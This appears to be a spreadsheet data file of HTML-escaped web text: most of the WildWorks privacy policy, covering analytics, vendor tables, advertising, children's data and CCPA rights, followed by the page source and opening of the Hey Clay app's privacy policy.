&lt;p&gt;&lt;strong&gt;Mobile Analytics.&lt;/strong&gt; WildWorks uses mobile analytics software to better understand the functionality of its apps on your phone. This software may record information such as how often you use the application, the events that occur within the application, aggregated usage, performance data, and where the application was downloaded from.</t>
  </si>
  <si>
    <t>WildWorks does not link the information stored within the analytics software to any personal information you submit within the application.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Local Storage Objects.&lt;/strong&gt; WildWorks uses Local Storage Objects (LSOs) such as HTML 5 or Flash to store content information and preferences. Third-parties with whom WildWorks partners to provide certain features on WildWorks' site or, where applicable, to display advertising based upon your Web browsing activity use LSOs such as HTML 5 or Flash to collect and store information.&lt;/p&gt;
&lt;p&gt;LSOs act like cookies in that they store information to provide you with a more customized experience, but LSOs can store complex data that cookies cannot, and LSOs are not deleted or rejected if you set your browser to delete or reject cookies.</t>
  </si>
  <si>
    <t>The information stored in any LSO deployed by our Sites is not used to profile or track you online. Although browser settings will not allow you to manage LSOs, you may be able to manage them in other ways. To find out more about how to manage or delete LSOs, visit &lt;a href="https://helpx.adobe.com/flash-player/kb/disable-local-shared-objects-flash.html"&gt;https://helpx.adobe.com/flash-player/kb/disable-local-shared-objects-flash.html&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;3.</t>
  </si>
  <si>
    <t>How Information Is Used, Shared and Disclosed.&lt;/h2&gt;
&lt;p&gt;WildWorks does not sell, and generally does not disclose, your Personal Information to third-parties without your consent.&lt;/p&gt;
&lt;p&gt;WildWorks uses Personal, Non-Personal, and Financial Information, among other things, to monitor system performance, analyze internal business systems, improve the WildWorks Services, fulfill requests for additional products and services, contact you about promotional and marketing activities, provide customer support, deliver advertising, and conduct research. The use and protection of information is an important component of WildWorks' business. Situations in which WildWorks shares or discloses your information also include:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Legal.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>WildWorks may disclose information you provide to respond to subpoenas, court orders, requests from authorities, and other legal processes, and to establish/exercise WildWorks' legal rights. WildWorks may also disclose your information to defend against legal claims when WildWorks believes that disclosure is necessary to protect WildWorks' rights, protect your safety or the safety of others, investigate fraud, or respond to a valid government request. WildWorks may share Personal Information in order to investigate, prevent, or take action regarding illegal activities, suspected fraud, and situations involving potential threats to the physical safety of any person, violations of WildWorks' Terms of Service, or as otherwise required by law.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Business Transfers.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>As WildWorks continues to develop its business, WildWorks may reorganize as a business entity, acquire entities, subsidiaries, or business units, or enter into joint ventures with third-parties. In any of these types of transactions, any information you provide may be one of the transferred business assets (subject to any pre-existing privacy notice unless you consent otherwise). In the event that all or substantially all of WildWorks' assets are acquired or WildWorks merges with a third-party, your information will likely be one of the transferred assets.</t>
  </si>
  <si>
    <t>You understand and agree that WildWorks reserves the right to transfer any information collected from you in the case of any such transfer. In such an event, WildWorks will use reasonable efforts to notify you before Personal Information about you is transferred and becomes subject to a different privacy policy.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Affiliated Businesses We Do Not Control.&lt;/strong&gt; WildWorks may use third-party companies and individuals to perform functions on WildWorks' behalf. You may find a list of third-party operators here:&lt;/p&gt;
	&lt;h3&gt;Dash Tag&lt;/h3&gt;
	&lt;table&gt;
		&lt;tbody&gt;
			&lt;tr&gt;
				&lt;th&gt;&lt;strong&gt;Vendor&lt;/strong&gt;&lt;/th&gt;
				&lt;th&gt;&lt;strong&gt;Collects&lt;/strong&gt;&lt;/th&gt;
				&lt;th&gt;&lt;strong&gt;Purpose&lt;/strong&gt;&lt;/th&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
				&lt;td&gt;Appsflyer&lt;/td&gt;
				&lt;td&gt;- Unique device ID &lt;br&gt;
					- Broad-based location (i.e. country or U.S. State, as applicable)&lt;/td&gt;
				&lt;td&gt;Manages Dash Tag ads in other apps and websites&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
				&lt;td&gt;Facebook&lt;/td&gt;
				&lt;td&gt;- Unique device ID &lt;br&gt;
					- Broad-based location (i.e. country or U.S. State, as applicable)&lt;/td&gt;
				&lt;td&gt;Cloud save functionality&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
				&lt;td&gt;Fyber&lt;/td&gt;
				&lt;td&gt;- Unique device ID &lt;br&gt;
					- Broad-based location (i.e. country or U.S. State, as applicable)&lt;/td&gt;
				&lt;td&gt;Delivers 3rd party kid-safe advertisements to players&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
				&lt;td&gt;Unity&lt;/td&gt;
				&lt;td&gt;- Unique device ID &lt;br&gt;
					- Broad-based location (i.e. country or U.S. State, as applicable)&lt;/td&gt;
				&lt;td&gt;Analytics to improve app performance and stability&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
				&lt;td&gt;Zendesk&lt;/td&gt;
				&lt;td&gt;- Email address&lt;br&gt;
					- Other info submitted by users&lt;/td&gt;
				&lt;td&gt;Manages customer support requests and delivers responses from our staff&lt;/td&gt;
			&lt;/tr&gt;
		&lt;/tbody&gt;
	&lt;/table&gt;
	&lt;h3&gt;Tag with Ryan&lt;/h3&gt;
	&lt;table&gt;
		&lt;tbody&gt;
			&lt;tr&gt;
				&lt;th&gt;&lt;strong&gt;Vendor&lt;/strong&gt;&lt;/th&gt;
				&lt;th&gt;&lt;strong&gt;Collects&lt;/strong&gt;&lt;/th&gt;
				&lt;th&gt;&lt;strong&gt;Purpose&lt;/strong&gt;&lt;/th&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
				&lt;td&gt;Kidoz&lt;/td&gt;
				&lt;td&gt;- Unique device ID&lt;br&gt;
					- Broad-based location (i.e. country or U.S. State, as applicable)&lt;/td&gt;
				&lt;td&gt;Delivers 3rd party kid-safe advertisements to players&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
				&lt;td&gt;SuperAwesome&lt;/td&gt;
				&lt;td&gt;- Unique device ID
					- Broad-based location (i.e. country or U.S. State, as applicable)&lt;/td&gt;
				&lt;td&gt;Delivers 3rd party kid-safe advertisements to players&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
				&lt;td&gt;Unity&lt;/td&gt;
				&lt;td&gt;- Unique device ID
					- Broad-based location (i.e. country or U.S. State, as applicable)&lt;/td&gt;
				&lt;td&gt;Delivers 3rd party kid-safe advertisements to players&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
				&lt;td&gt;Zendesk&lt;/td&gt;
				&lt;td&gt;- Email address&lt;br&gt;
					- Other info submitted by users&lt;/td&gt;
				&lt;td&gt;Manages customer support requests and delivers responses from our staff&lt;/td&gt;
			&lt;/tr&gt;
		&lt;/tbody&gt;
	&lt;/table&gt;
*</t>
  </si>
  <si>
    <t>Some of our third-party providers may share persistent identifiers with other third parties to support their own internal operations, for example, collecting device data for fraud detection.   WildWorks confirms with these third party that such collection and processing is strictly limited by contract for the specific purposes and that information may not be used or shared for any other purposes, including for behavioural advertising or to amass a profile on a user of WildWorks apps. xamples include fulfilling orders, processing payments, hosting, data storage, sending postal mail and email, removing repetitive information from customer lists, analyzing data, providing marketing assistance, providing search results and links (including paid listings and links), processing credit card payments, and providing customer service.</t>
  </si>
  <si>
    <t>WildWorks will provide such entities with access to certain information needed to perform their functions, but will take measures to ensure that they may not use it for other purposes. WildWorks shares information only as described above and with third-parties that are either subject to this Privacy Policy or to a privacy policy that is at least as protective as this Privacy Policy.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt; We may share Information for other reasons in the future, which we will disclose and describe to you directly or in updates to this Privacy Policy.&lt;/p&gt;
&lt;p&gt;Please contact us below with questions about the privacy policies, collection and use practices of these third parties:&lt;/p&gt;
&lt;p&gt;WildWorks&lt;/br&gt;
Attn: Data Protection Officer&lt;/br&gt;
PO Box 3624&lt;/br&gt;
Salt Lake City, UT 84110-3624&lt;/p&gt;
&lt;h2&gt;4.</t>
  </si>
  <si>
    <t>Security&lt;/h2&gt;
&lt;p&gt; The security of your Personal Information is important to WildWorks. WildWorks follows generally accepted industry standards to protect the Personal Information submitted to WildWorks, both during transmission and once it is received.</t>
  </si>
  <si>
    <t>However, no method of transmission over the Internet or method of electronic data storage is 100% secure. Therefore, WildWorks cannot guarantee the absolute security of data it stores. Although no security system is completely secure, WildWorks and its third-party partners and vendors take appropriate security measures to protect against unauthorized access or disclosure of the information collected by WildWorks.</t>
  </si>
  <si>
    <t xml:space="preserve">For WildWorks, this includes, but is not limited to, ensuring that all Personal and Financial Information is disclosed only on a "need to know" basis and ensuring that all Personal Information collected by WildWorks is obtained via secured connections and protected and encrypted (using  at minimum Transport Layer Security (TLS) 1.2 encryption protocol) by industrial grade security software to guard against unauthorized access.&lt;/p&gt;
&lt;h2&gt;5. Advertising&lt;/h2&gt;
&lt;p&gt;WildWorks may partner with third parties to display advertising on its websites and Apps, or to manage its advertising on other sites or services. Some of the advertising displayed on our services is contextual, meaning those that relate to the content you are viewing.  </t>
  </si>
  <si>
    <t xml:space="preserve">We do not collect personal information to serve contextual ads to users.&lt;/p&gt;
&lt;p&gt;On our services that are directed to a general audience or where we have determined the age of the visitor is over the age of 13, WildWorks collects your device ID and may pass it to advertisers to enable interest-based advertising.   Interest-based advertisements may be served to you based on your browsing activities and interests on our sites and services and across other services and platforms.   For interest-based ads, third-party partners may use cookies or similar technologies that collect personal information in order to provide you with advertising based upon your browsing activities and interests.&lt;/p&gt;
&lt;p&gt;For more information about targeted advertising provided by these third parties, and how to opt out of having your information used in this way by companies that participate in the Digital Advertising Alliance, please visit: www.aboutads.info/choices or www.networkadvertising.org/managing/opt_out.asp.  </t>
  </si>
  <si>
    <t>You may refer to our list of third parties in section 3 of this policy to see which of our third-party service providers offer consumer opt-out choices through the Digital Advertising Alliance’s (DAA) and/or Network Advertising Initiative’s (NAI) sites. WildWorks may include third-party ads in free versions of its mobile applications, in which case we may collect your Device ID and pass it to advertisers to enable certain advertising.&lt;/p&gt;
&lt;p&gt;For users that have identified themselves as under the age of 13 or are presumed to be under 13 based on the target audience of the app (or the legal threshold age in your country of residence), we will not allow third parties to collect personal information to track or serve interest-based ads.   We do not collect personal information to serve contextual ads to users.&lt;/p&gt;
&lt;h2&gt;6.</t>
  </si>
  <si>
    <t>Social Media Features and Tools&lt;/h2&gt;
&lt;p&gt; The WildWorks Services may include integrated social media features and tools, such as the Facebook login or "Like" button, the YouTube "Share This" button, and interactive mini-programs that run in the WildWorks Services. These Features may collect information on your IP address, which page you are visiting on WildWorks' site, and may set a cookie to enable the feature to function properly.</t>
  </si>
  <si>
    <t xml:space="preserve">Social media features and tools are either hosted by a third-party or hosted directly on the WildWorks Services. Your interactions with these integrated social media features and tools are governed by the privacy policies of the companies providing them. These features such as Facebook login, do not apply to our child directed apps.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;h2&gt;7. Links to Other Sites&lt;/h2&gt;
&lt;p&gt; The WildWorks Services contain links to other sites that are not owned or controlled by WildWorks.</t>
  </si>
  <si>
    <t>Please be aware that WildWorks is not responsible for the privacy practices of such other sites. WildWorks encourages you to be aware when you leave WildWorks' site and to read the privacy statements of each and every website that collects personally identifiable information. This Privacy Policy applies only to information collected by the WildWorks Services.&lt;/p&gt;
&lt;h2&gt;8.</t>
  </si>
  <si>
    <t>Access/Data Retention&lt;/h2&gt;
&lt;p&gt; We keep Personal Information for as long as is appropriate or relevant for the practices described in this Policy, including accessing and servicing accounts, providing help to players, communicating with parents and guardians, resolving disputes, and as required by law.   &lt;/p&gt;
&lt;p&gt;Parents have the right to consent to the collection and use of personal information from their child without also consenting to its disclosure to third-parties.</t>
  </si>
  <si>
    <t>If you or your child's information changes, or if you no longer desire the WildWorks Services, you may make corrections and updates, delete inaccuracies, or request deletion by updating your account information within the relevant WildWorks Services or by contacting WildWorks at privacy@wildworks.com.&lt;/p&gt;
&lt;h2&gt;9. Where we store information&lt;/h2&gt;
&lt;p&gt;Information we store may be stored both within and outside of the United States. If you live outside of the United States, you understand and agree that we may transfer your information to the United States.</t>
  </si>
  <si>
    <t>WildWorks is subject to U.S. laws, which may not afford the same level of protection as those in your country.&lt;/p&gt;
&lt;h2&gt;10. Special Notice Regarding Children&lt;/h2&gt;
&lt;p&gt;Some of our services are directed to an audience that includes children while others are directed to a general audience.</t>
  </si>
  <si>
    <t>&lt;strong&gt; The age of consent regarding privacy and data may differ depending on your locale and jurisdiction.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For our general audience services, WildWorks does not knowingly collect Personal Information from persons under the age of 15. If it comes to WildWorks' attention that Personal Information has been collected from a person under the age of 15, WildWorks will delete this information as quickly as possible.</t>
  </si>
  <si>
    <t>If you believe that WildWorks may have Personal Information from or about a child under the age of 15, please contact WildWorks at support@wildworks.com.&lt;/p&gt;
&lt;p&gt;Where WildWorks requires device owners to specify their age or where the target audience is presumed to be a child under 13, it does not collect personal information from users without a lawful basis such as to support the internal operations of our services or with parental consent before any Personal Information is collected.&lt;/p&gt;
&lt;h2&gt;11. California Privacy Rights&lt;/h2&gt;
&lt;p&gt;Since 2005, California Civil Code Section 1798.83 permits our customers who are California residents to request certain information regarding disclosure of personal information to third parties for their direct marketing purposes. You are hereby notified that we do not share our customers’ personal information with unaffiliated third parties for their own direct marketing purposes.&lt;/p&gt;
&lt;p&gt;The California Consumer Privacy Act (CCPA) also provides California residents with specific rights regarding their personal information.</t>
  </si>
  <si>
    <t>You have the right to request that WildWorks disclose to you certain specific information about our collection and use of your personal information over the past 12 months.&lt;/p&gt;
&lt;p&gt;To exercise your rights to access, data portability, and deletion under the CCPA, please submit a verifiable consumer request to us by either:&lt;/p&gt;
&lt;p&gt;&lt;u&gt;Emailing our Data Protection Officer&lt;/u&gt; at privacy@wildworks.com&lt;/br&gt;
or&lt;/br&gt;
&lt;u&gt;Submitting your request through postal mail&lt;/u&gt; at this address:&lt;/br&gt;
WildWorks&lt;/br&gt;
Attn: Data Protection Officer&lt;/br&gt;
P.O. Box 3624&lt;/br&gt;
Salt Lake City, UT 84110-3624
&lt;/p&gt;
&lt;p&gt;Only you or a person registered with the California Secretary of State that is authorized to act on your behalf may make a verifiable consumer request in connection with your rights under the CCPA. You may also make a verifiable consumer request on behalf of your minor child. You may only make a verifiable consumer request for access or data portability twice within any 12-month period.</t>
  </si>
  <si>
    <t>The verifiable request must include the following:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;Sufficient information for us to reasonably verify that you are the person about whom we connected personal information, or that you are the authorized representative of that person, and;&lt;/li&gt;
	&lt;li&gt;A description of your request, with sufficient detail for us to properly understand, evaluate, and respond to it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt; We cannot respond to your request or provide you with personal information unless we can verify your identity or your authority to make the request, and confirm that the information requested relates to you.&lt;/p&gt;
&lt;p&gt; We will only use the personal information provided in a verifiable consumer request to verify the requestor’s identity or authority to make the request, and to research and fulfill the requests that are verified.&lt;/p&gt;
&lt;h2&gt;12.</t>
  </si>
  <si>
    <t>California Privacy Rights for Minor Users&lt;/h2&gt;
&lt;p&gt;Since January 1, 2015, California Business and Professions Code Section 22581 permits you, if you are a California resident under the age of 18, to view, correct, or remove information provided by you or publicly posted by you.&lt;/p&gt;
&lt;p&gt;You may send us an email asking us to remove certain posted content at &lt;u&gt;privacy@wildworks.com&lt;/u&gt;, or mail your request to us at:&lt;/p&gt;
&lt;p&gt;WildWorks&lt;/br&gt;
Attn: Data Protection Officer&lt;/br&gt;
P.O. Box 3624&lt;/br&gt;
Salt Lake City, UT 84110-3624&lt;/p&gt;
&lt;p&gt; We will be happy to review, update, or remove Information as required by law. Residual copies of information or content that have been removed from your account may remain in our backup systems for approximately one month.</t>
  </si>
  <si>
    <t>We may still retain your information required to resolve disputes, enforce our user agreement, or comply with legal requirements; in this case, your personal information will be blocked from use for any other purpose.&lt;/p&gt;
&lt;h2&gt;13. Conditions of Use/Changes to This Privacy Policy&lt;/h2&gt;
&lt;p&gt;WildWorks may update this Privacy Policy to reflect changes to information practices. If WildWorks makes any material changes, WildWorks will notify you by email (sent to the email address specified in your account) or by means of a notice on WildWorks' website (www.WildWorks.com) prior to the change becoming effective.</t>
  </si>
  <si>
    <t>WildWorks encourages you to periodically review this page for the latest information on its privacy practices. If WildWorks makes material changes to how Personal Information collected from children under age 15 is used, WildWorks will notify parents by email in order to obtain verifiable parental consent or, if WildWorks does not have such email addresses to contact parents directly, by reasonable means on WildWorks' website for the new uses of the child's Personal Information.&lt;/p&gt;
&lt;h2&gt;14. CARU COPPA</t>
  </si>
  <si>
    <t>Safe Harbor&lt;/h2&gt;
&lt;p&gt; We are a participating member of the CARU COPPA Safe Harbor Program. Specifically, Tag with Ryan is certified to meet established online information collection, use and disclosure practices, however, we take steps to confirm that all of our WildWorks Services follow the applicable data collection guidance and principles of C</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html &gt;
&lt;head&gt;&lt;meta charset="utf-8"&gt;
&lt;title&gt;Privacy Policy | Hey Clay&lt;/title&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;link rel="preload" as="font" type="font/otf" crossorigin="anonymous" href="/fonts/HEYCLAY-Regular.otf"&gt;
&lt;style&gt;@font-face{font-family:"HeyClay";font-weight:400;font-display:block;font-style:normal;src:url('/fonts/HEYCLAY-Regular.otf') format('opentype');}&lt;/style&gt;
&lt;meta name="og:site_name" content="Hey Clay"&gt;
&lt;meta property="og:title" content="Hey Clay"&gt;
&lt;meta name="apple-mobile-web-app-title" content="Hey Clay"&gt;
&lt;meta name="twitter:title" content="Hey Clay"&gt;
&lt;meta name="description" content="Captivating and wonderful language of clay animation is our style of educational communication
with a kid. Hey Clay is designed to spark your kid's creative potential and take on a fantastic journey of discovery and crafts!</t>
  </si>
  <si>
    <t>Apps and claysets we make are aimed at the development	of a child in an entertaining and intuitive way"&gt;
&lt;meta name="og:description" content="Captivating and wonderful language of clay animation is our style of educational communication
with a kid. Hey Clay is designed to spark your kid's creative potential and take on a fantastic journey of discovery and crafts! Apps and claysets we make are aimed at the development	of a child in an entertaining and intuitive way"&gt;
&lt;meta property="og:image" content="/images/main.jpg"&gt;
&lt;meta property="og:image:width" content="989"&gt;
&lt;meta property="og:image:height" content="746"&gt;
&lt;meta name="keywords" content="Hey Clay, heyclay , Sculpting toy, Sculpting clay, Air-dry, Non sticky clay, Clay and Toy, Interactive App, Colors, Claymates, Fantasy, Children Play"&gt;
&lt;link rel="icon" type="image/x-icon" href="/favicon.ico"&gt;
&lt;link rel="preconnect" href="https://fonts.googleapis.com"&gt;
&lt;link rel="preconnect" href="https://fonts.gstatic.com"&gt;
&lt;link rel="stylesheet" href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@200;300;400;500;600&amp;display=swap"&gt;
&lt;meta name="description" content="HEY CLAY, LLC (we) are committed to protecting your personal data and respecting your privacy. "&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/entry.0d947206.js"&gt;&lt;link rel="preload" as="style" href="/_nuxt/entry.86dbe759.css"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/default.cc2a339b.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/use-default-head.composable.cfad3f6f.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/composables.ae7286af.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/HeyClayFooter.2b2df520.js"&gt;&lt;link rel="preload" as="style" href="/_nuxt/HeyClayHeader.f286906b.css"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/composables.5192a63e.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/HeyClayHeader.6629a82b.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/HamburgerIcon.d5d2c8a7.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/privacy-policy.be26c9f8.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ContentRenderer.8a20c562.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ContentRendererMarkdown.ff74a508.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/_commonjsHelpers.fed2a411.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/asyncData.fcd88e44.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/query.221f0c49.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/utils.9dfcfbd4.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/head.229bed90.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/HeyClayPage.38ad8d0b.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseP.064c11da.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseStrong.956a21c7.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseH2.a7a2c938.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseUl.e0627d22.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseLi.4c31e959.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseA.d06715af.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseH4.cdb376eb.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseEm.8b8367e9.js"&gt;&lt;link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseOl.923e06a8.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/de.49042778.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/es.4ca87422.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/fr.c61f4373.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/hk.841fd9e5.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/hu.fcf69f0f.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/it.c7696251.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/pt.7608e092.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/ro.02e4f5eb.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/ua.3f6bc107.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/web-socket.69364768.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/app-layout.4bebe059.js"&gt;&lt;link rel="prefetch" as="style" href="/_nuxt/HeyClayAppHeader.3c922a7a.css"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/HeyClayAppHeader.95b355a8.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/HeaderRO.5771682a.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/HeaderIT.d431edf8.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/HeaderHK.94536a6a.js"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/error-component.31c1e303.js"&gt;&lt;link rel="prefetch" as="style" href="/_nuxt/error-component.d9df24a0.css"&gt;&lt;link rel="prefetch" as="style" href="/_nuxt/HeyClayPage.2f1fdd86.css"&gt;&lt;link rel="prefetch" as="style" href="/_nuxt/HeyClayImage.180ad9aa.css"&gt;&lt;link rel="prefetch" as="script" crossorigin href="/_nuxt/HeyClayImage.538bee70.js"&gt;&lt;link rel="stylesheet" href="/_nuxt/entry.86dbe759.css"&gt;&lt;link rel="stylesheet" href="/_nuxt/HeyClayHeader.f286906b.css"&gt;&lt;style&gt;.main-default[data-v-7bb8dfd0]{align-items:stretch;display:flex;flex:1;flex-direction:column;height:100%;padding-top:3.75rem}
&lt;/style&gt;&lt;style&gt;.privacy{display:flex;flex:1;flex-direction:column;line-height:1.4;padding:3.5rem 0}.privacy a{color:#00c2ce;text-decoration:underline}.privacy h1{color:#00c2ce;font-family:HeyClay}.privacy h2 a,.privacy h3 a,.privacy h4 a{color:#00c2ce;font-family:HeyClay;text-decoration:none}.privacy h1{font-size:3rem;margin-bottom:1.375rem;margin-top:.375rem}.privacy h2{font-size:2.5rem;margin-bottom:1.25rem;margin-top:.25rem}.privacy h3{font-size:2rem;margin-bottom:1.125rem;margin-top:.125rem}.privacy h4{font-size:1.5rem;margin-bottom:1rem}.privacy p{font-weight:300;margin-bottom:1rem}.privacy p:last-child{margin-bottom:0}.privacy ol,.privacy ul{list-style-position:inside;margin-bottom:1rem;margin-left:2rem}.privacy ol li,.privacy ul li{font-weight:300;margin-bottom:1rem}.privacy ol li:last-child,.privacy ul li:last-child{margin-bottom:0}
&lt;/style&gt;&lt;style&gt;.generic[data-v-85438d96]{display:flex;flex:1;flex-direction:column}.default[data-v-85438d96]{align-items:center;margin:0 calc((min(7.3958333333vw,142px) + 20px)*2)}.default .default-limit[data-v-85438d96]{max-width:1270px;width:100%}@media (max-width:1440px){.default[data-v-85438d96]{margin:0 calc(min(7.3958333333vw,142px)</t>
  </si>
  <si>
    <t>+ 20px)}}@media (max-width:600px){.default[data-v-85438d96]{margin:0 5vw}}
&lt;/style&gt;&lt;/head&gt;
&lt;body &gt;&lt;div id="__nuxt"&gt;&lt;!--[--&gt;&lt;div class="global" data-v-7bb8dfd0&gt;&lt;header class="header-global" data-v-7bb8dfd0 data-v-e5600975&gt;&lt;div class="header-content" data-v-e5600975&gt;&lt;a href="/" class="logo" data-v-e5600975&gt;&lt;img src="/logo/heyclay-header.png" alt="Hey Clay logo" data-v-e5600975&gt;&lt;/a&gt;&lt;div class="routes routes-desktop" data-v-e5600975&gt;&lt;a href="/#about" class="route" data-v-e5600975&gt;About Us&lt;/a&gt;&lt;a href="/#application" class="route" data-v-e5600975&gt;App&lt;/a&gt;&lt;a href="/#products" class="route" data-v-e5600975&gt;Product Lines&lt;/a&gt;&lt;a href="/#contacts" class="route" data-v-e5600975&gt;Contacts&lt;/a&gt;&lt;/div&gt;&lt;div class="container-toggle" data-v-e5600975&gt;&lt;button type="button" name="hamburger menu" data-v-e5600975&gt;&lt;div class="icon-component disable-pointer" data-v-e5600975 data-v-66861dd6&gt;&lt;svg width="32" height="23" viewBox="0 0 32 23" fill="none" xmlns="http://www.w3.org/2000/svg" data-v-66861dd6&gt;&lt;path d="M1 1.01904H31M1 11.0836H31M1 21.019H31" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" data-v-66861dd6&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/div&gt;&lt;/button&gt;&lt;!----&gt;&lt;/div&gt;&lt;/div&gt;&lt;/header&gt;&lt;main class="main-default" data-v-7bb8dfd0&gt;&lt;!--[--&gt;&lt;div class="default generic" data-v-85438d96&gt;&lt;div class="default-limit generic" data-v-85438d96&gt;&lt;!--[--&gt;&lt;div class="privacy"&gt;&lt;p&gt;&lt;!--[--&gt;HEY CLAY, LLC (&lt;strong&gt;&lt;!--[--&gt;we&lt;!--]--&gt;&lt;/strong&gt;) are committed to protecting your personal data and respecting your privacy.&lt;!--]--&gt;&lt;/p&gt;&lt;h2 id="introduction"&gt;&lt;a href="#introduction"&gt;&lt;!--[--&gt;INTRODUCTION&lt;!--]--&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;!--[--&gt;This Privacy Policy (together with our end-user licence agreement (&lt;strong&gt;&lt;!--[--&gt;EULA&lt;!--]--&gt;&lt;/strong&gt;) and any additional terms of use incorporated by reference into the EULA that form together our &lt;strong&gt;&lt;!--[--&gt;Terms of Use&lt;!--]--&gt;&lt;/strong&gt;) applies to your use of:&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;HEY CLAY mobile application software (&lt;strong&gt;&lt;!--[--&gt;App&lt;!--]--&gt;&lt;/strong&gt;) available on App Store and Google Play Market once you have downloaded a copy of the App onto your mobile or other handheld devices (&lt;strong&gt;&lt;!--[--&gt;Device&lt;!--]--&gt;&lt;/strong&gt;).&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;Any of the services accessible through the App (&lt;strong&gt;&lt;!--[--&gt;Services&lt;!--]--&gt;&lt;/strong&gt;), unless the EULA states that a separate privacy policy applies to a particular Service, in which case that privacy policy only applies.&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--[--&gt;This Privacy Policy sets out the basis on which any personal data we collect from you, or that you provide to us, if it takes place, will be processed by us. Please read the following carefully to understand our practices regarding your personal data and how we will treat it.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;This Privacy Policy does not apply to your use of our or our affiliates’ websites, where the relevant Privacy Policy and Cookies Policy are applicable.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;We offer users a number of activities, most of which are directed at children under the age of 16 (for the purpose of General Data Protection Regulation) and 13 (for the purpose of Children’s Online Privacy Protection Act), and other activities that are targeted for older users.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;The Children’s Online Privacy Protection Act (COPPA) requires us to inform parents or legal guardians about how we collect, use, and disclose personal information from children under the age of 13.</t>
  </si>
  <si>
